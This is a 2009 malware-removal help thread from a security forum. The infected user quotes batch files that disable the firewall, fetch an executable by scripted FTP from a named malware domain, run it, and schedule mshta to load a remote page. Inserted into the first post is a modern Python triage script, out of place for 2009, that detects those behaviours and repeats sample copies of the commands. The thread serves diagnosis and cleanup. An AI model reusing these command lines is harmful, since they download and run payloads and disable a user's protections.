
Infection FTP's from malware site


  • This topic is locked
5 replies to this topic

#1 grandmasterphat

grandmasterphat

  • Members
  • 15 posts
  • OFFLINE
  • Local time:03:24 PM

Posted 16 June 2009 - 12:52 AM

Hi,
First post so hi all! I'm having some trouble with a nasty infection I picked up somehow. So far I've run Malwarebytes Anti-Malware and AVG to remove the bulk of the problem. But there's still something there that AVG picks up but can only deal with the symptom, not the cause.

At what looks like scheduled times, a batch file is created with a random name like hjBk8WI.bat in c:\. The contents of this file are:
@echo off
netsh firewall set opmode disable
ftp -s:c:\MaJcwy.txt zaebalisuki.com <--- other known malware domains are used as well as this one.
start c:\eYVJcEi.exe
start c:\eYVJcEi.exe
start c:\eYVJcEi.exe
start c:\eYVJcEi.exe
start c:\eYVJcEi.exe
start c:\eYVJcEi.exe
start c:\eYVJcEi.exe
start c:\eYVJcEi.exe
exit

Looking at the MaJcwy.txt script that it gets the FTP instructions from, it downloads an executable:
qqq
123456
bin
get calc.exe c:\eYVJcEi.exe
bye

Another batch file is created at the same time, again with a random name, but this one contains a schedule to run mshta.exe:
@echo off
sc config Schedule start= auto
net start Schedule
at /delete /yes
at 00:05 /every:M,T,W,Th,F,S,Su mshta.exe http:///woqyymmptn.cn/33t.php
at 00:22 /every:M,T,W,Th,F,S,Su mshta.exe http:///woqyymmptn.cn/33t.php
exit

The batch file is much bigger; this is just the first few lines of it.

When the executable file that was ftp'd in is run AVG picks it up and flags cmd.exe as a possible culprit. I've blocked port 21 to prevent it from making an FTP connection out to get this executable, but none of the scanners I have can pick up the culprit for all of this. Any help much appreciated!

Thanks,
GMP

Edited by garmanma, 16 June 2009 - 07:53 AM.
Disabled links to be on the safe side
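The three artefacts quoted in the post above (the dropper batch file, the `ftp -s:` script it feeds, and the scheduler batch file) follow fixed formats, so a responder can parse them rather than read them by hand. The script below is an added example, not code from the thread or from any tool the posters mention: it scores a batch file against the behaviours described above, pulls the FTP host and script path out of the `ftp` line, extracts the local path each `get` writes the payload to, and lists the recurring tasks each `at` line would register. The sample inputs are constructed; the random file names are the ones quoted in the post, and `malware-host.invalid` is a placeholder standing in for the domains the poster named.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed samples modelled on the three artefacts quoted in the post above.
# File names are the post's random names; the host is a placeholder, not a real indicator.
SAMPLE_DROPPER_BAT = """@echo off
netsh firewall set opmode disable
ftp -s:c:\\MaJcwy.txt malware-host.invalid
start c:\\eYVJcEi.exe
start c:\\eYVJcEi.exe
start c:\\eYVJcEi.exe
exit
"""

SAMPLE_FTP_SCRIPT = """qqq
123456
bin
get calc.exe c:\\eYVJcEi.exe
bye
"""

SAMPLE_SCHEDULER_BAT = """@echo off
sc config Schedule start= auto
net start Schedule
at /delete /yes
at 00:05 /every:M,T,W,Th,F,S,Su mshta.exe http://malware-host.invalid/33t.php
at 00:22 /every:M,T,W,Th,F,S,Su mshta.exe http://malware-host.invalid/33t.php
exit
"""

# One rule per behaviour seen in the post; each regex is applied to a stripped line.
RULES: List[Tuple[str, re.Pattern]] = [
    ("firewall_disabled", re.compile(r"^netsh\s+firewall\s+set\s+opmode\s+disable\b", re.I)),
    ("scripted_ftp", re.compile(r"^ftp\s+.*-s:", re.I)),
    ("schedule_service_forced_on",
     re.compile(r"^(sc\s+config\s+Schedule\s+start=\s*auto|net\s+start\s+Schedule)\b", re.I)),
    ("existing_at_tasks_wiped", re.compile(r"^at\s+/delete\s+/yes\b", re.I)),
    ("mshta_remote_content", re.compile(r"\bmshta(\.exe)?\s+https?:", re.I)),
    ("exe_started_from_drive_root", re.compile(r"^start\s+[a-z]:\\[^\\\s]+\.exe\s*$", re.I)),
]

AT_LINE = re.compile(r"^at\s+(\d{1,2}:\d{2})\s+/every:([A-Za-z,]+)\s+(.+?)\s*$", re.I)
FTP_LINE = re.compile(r"^ftp\s+(?P<opts>(?:-\S+\s+)*)(?P<host>\S+)\s*$", re.I)


def find_indicators(batch_text: str) -> Dict[str, int]:
    """Count, per rule, how many lines of the batch file match it."""
    hits: Dict[str, int] = {}
    for raw in batch_text.splitlines():
        line = raw.strip()
        for name, pattern in RULES:
            if pattern.search(line):
                hits[name] = hits.get(name, 0) + 1
    return hits


def ftp_target(batch_text: str) -> Optional[Dict[str, Optional[str]]]:
    """Return the host and -s: script path of the first 'ftp' line, or None if there is none."""
    for raw in batch_text.splitlines():
        m = FTP_LINE.match(raw.strip())
        if m:
            script = re.search(r"-s:(\S+)", m.group("opts"))
            return {"host": m.group("host"), "script": script.group(1) if script else None}
    return None


def parse_ftp_script(script_text: str) -> Dict[str, object]:
    """Parse an 'ftp -s:' script: line 1 is the user, line 2 the password, then ftp commands."""
    lines = [l.strip() for l in script_text.splitlines() if l.strip()]
    if len(lines) < 2:
        return {"user": "", "password": "", "downloads": []}
    downloads: List[Tuple[str, str]] = []
    for cmd in lines[2:]:
        parts = cmd.split()
        if parts[0].lower() == "get" and len(parts) >= 2:
            # 'get remote [local]': the local name is where the payload lands on disk
            downloads.append((parts[1], parts[2] if len(parts) > 2 else parts[1]))
    return {"user": lines[0], "password": lines[1], "downloads": downloads}


def parse_at_tasks(batch_text: str) -> List[Dict[str, object]]:
    """Extract the recurring tasks each 'at HH:MM /every:... cmd' line would register."""
    tasks: List[Dict[str, object]] = []
    for raw in batch_text.splitlines():
        m = AT_LINE.match(raw.strip())
        if m:
            tasks.append({"time": m.group(1), "days": m.group(2).split(","), "command": m.group(3)})
    return tasks


def triage(dropper: str, ftp_script: str, scheduler: str) -> Dict[str, object]:
    """Tie the three files together into the facts a responder needs: what was changed,
    where the payload came from, where it was written, and what keeps re-running it."""
    indicators = find_indicators(dropper)
    for name, n in find_indicators(scheduler).items():
        indicators[name] = indicators.get(name, 0) + n
    return {
        "indicators": indicators,
        "ftp": ftp_target(dropper),
        "dropped_files": [local for _, local in parse_ftp_script(ftp_script)["downloads"]],
        "scheduled": parse_at_tasks(scheduler),
    }
```

Run `triage(SAMPLE_DROPPER_BAT, SAMPLE_FTP_SCRIPT, SAMPLE_SCHEDULER_BAT)` to get one dictionary covering all three files. The `at` lines are the part worth looking at first: in the case above the scans keep coming back clean because the dropped executable is removed, but the recurring task that fetches the next one is still registered, so the `scheduled` list (and the output of `at` on the machine itself) tells you where the persistence actually lives.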



#2 boopme

boopme

    To Insanity and Beyond


  • Global Moderator
  • 73,490 posts
  • OFFLINE
  • Gender:Male
  • Location:NJ USA
  • Local time:04:24 PM

Posted 16 June 2009 - 08:55 AM

Hello, can you post the infected log of Malwarebytes? Maybe we can get an idea of what ran through here.

The log is automatically saved and can be viewed by clicking the Logs tab in MBAM.
Copy and paste the contents of that report in your next reply. Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.
How do I get help? Who is helping me?For the time will come when men will not put up with sound doctrine. Instead, to suit their own desires, they will gather around them a great number of teachers to say what their itching ears want to hear....Become a BleepingComputer fan: Facebook

#3 grandmasterphat

grandmasterphat
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  • Local time:03:24 PM

Posted 16 June 2009 - 11:05 PM

Hi,
Thanks for getting back to me. I've posted two logs here: one was the original log file and one run just a few minutes ago (with the most up-to-date database). As you can see, the latest scan detected nothing; however, these batch files are still being created, and if I unblock the FTP command port it sneaks out and gets the executable.

Latest scan:

Malwarebytes' Anti-Malware 1.37
Database version: 2291
Windows 5.1.2600 Service Pack 2

17/06/2009 3:59:03 p.m.
mbam-log-2009-06-17 (15-59-03).txt

Scan type: Full Scan (C:\|)
Objects scanned: 233534
Time elapsed: 42 minute(s), 39 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)


Older scan:

Malwarebytes' Anti-Malware 1.37
Database version: 2282
Windows 5.1.2600 Service Pack 2

15/06/2009 10:45:35 p.m.
mbam-log-2009-06-15 (22-45-35).txt

Scan type: Full Scan (C:\|)
Objects scanned: 223094
Time elapsed: 28 minute(s), 16 second(s)

Memory Processes Infected: 7
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 5
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 2

Memory Processes Infected:
c:\mCT22.exe (Adware.CashOn) -> Unloaded process successfully.
c:\mCT22.exe (Adware.CashOn) -> Unloaded process successfully.
c:\mCT22.exe (Adware.CashOn) -> Unloaded process successfully.
c:\mCT22.exe (Adware.CashOn) -> Unloaded process successfully.
c:\mCT22.exe (Adware.CashOn) -> Unloaded process successfully.
c:\mCT22.exe (Adware.CashOn) -> Unloaded process successfully.
c:\mCT22.exe (Adware.CashOn) -> Unloaded process successfully.

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\msn (Adware.CashOn) -> Quarantined and deleted successfully.
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\msnhost (Adware.CashOn) -> Quarantined and deleted successfully.
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\msnload (Adware.CashOn) -> Quarantined and deleted successfully.
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\msnconvert (Adware.CashOn) -> Quarantined and deleted successfully.
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\msnmessendger (Adware.CashOn) -> Quarantined and deleted successfully.

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
c:\mCT22.exe (Adware.CashOn) -> Delete on reboot.
c:\OGh01p.exe (Adware.CashOn) -> Quarantined and deleted successfully.


AVG picks up the .exe when it tries to run and fixes it, but there's something out there that's still running all this that neither AVG nor MBAM is picking up. The Processes tab under Task Manager shows multiple instances of cmd.exe and mshta.exe running, which looks out of place.

Many thanks!

#4 boopme

boopme

    To Insanity and Beyond


  • Global Moderator
  • 73,490 posts
  • OFFLINE
  • Gender:Male
  • Location:NJ USA
  • Local time:04:24 PM

Posted 17 June 2009 - 10:41 AM

Hi, those files can be either real or malware. The real file is needed. So we should get the HJT team to dig it out safely.

You need to run HJT/DDS.
Please follow this guide: go and do steps 6 and 7 of the Preparation Guide For Use Before Using Hijackthis. Then go here: HijackThis Logs and Virus/Trojan/Spyware/Malware Removal, click New Topic, give it a relevant Title and post that complete log.

Let me know if it went OK.

#5 grandmasterphat

grandmasterphat
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  • Local time:03:24 PM

Posted 18 June 2009 - 06:55 AM

Thanks for all the help, I will post the logs shortly.

#6 Orange Blossom

Orange Blossom

    OBleepin Investigator


  • Moderator
  • 37,011 posts
  • OFFLINE
  • Gender:Not Telling
  • Location:Bloomington, IN
  • Local time:04:24 PM

Posted 19 June 2009 - 10:17 PM

Hello,

Now that you have posted a log here: http://www.bleepingcomputer.com/forums/t/235106/infection-undetectable-ftps-files-from-malware-site/ you should NOT make further changes to your computer (install/uninstall programs, use special fix tools, delete files, edit the registry, etc) unless advised by a HJT Team member, nor should you ask for help elsewhere. Doing so can result in system changes which may not show in the log you already posted. Further, any modifications you make on your own may cause confusion for the helper assisting you and could complicate the malware removal process which would extend the time it takes to clean your computer.

From this point on the HJT Team should be the only members that you take advice from, until they have verified your log as clean.

Please be patient. It may take a while to get a response because the HJT Team members are EXTREMELY busy working logs posted before yours. They are volunteers who will help you out as soon as possible. Once you have made your post and are waiting, please DO NOT make another reply until it has been responded to by a member of the HJT Team. Generally the staff checks the forum for postings that have 0 replies as this makes it easier for them to identify those who have not been helped. If you post another response there will be 1 reply. A team member, looking for a new log to work, may assume another HJT Team member is already assisting you and not open the thread to respond. Please be patient. It may take a while to get a response, but your log will be reviewed and answered as soon as possible.

To avoid confusion, I am closing this topic. Good luck with your log.

Orange Blossom :thumbsup: